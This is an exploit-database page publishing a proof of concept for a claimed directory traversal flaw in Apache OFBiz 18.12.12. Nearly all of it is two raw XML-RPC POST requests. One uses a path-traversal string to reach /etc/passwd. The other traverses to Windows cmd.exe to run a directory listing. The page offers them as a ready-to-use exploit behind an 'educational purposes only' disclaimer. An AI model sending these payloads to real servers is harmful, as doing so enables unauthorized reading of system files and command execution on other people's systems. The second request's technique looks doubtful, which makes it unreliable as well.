Apache ofbiz 18.12.12 directory traversal Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2024-05-19 | Type : webapps | Platform : java
This exploit / vulnerability Apache ofbiz 18.12.12 directory traversal is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Apache OFBiz 18.12.12 - Directory Traversal
# Google Dork: N/A
# Date: 2024-05-16
# Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly)
# Vendor Homepage: https://ofbiz.apache.org/
## Software Link: https://ofbiz.apache.org/download.html
# Version: below <=18.12.12
# Tested on: Windows10


Poc.
1-
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
<methodName>example.createBlogPost</methodName>
<params>
<param>
<value><string>../../../../../../etc/passwd</string></value>
</param>
</params>
</methodCall>

OR

2-
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
<methodName>performCommand</methodName>
<params>
<param>

<value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
</param>
</params>
</methodCall>

Apache ofbiz 18.12.12 directory traversal


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Apache ofbiz 18.12.12 directory traversal Vulnerability / Exploit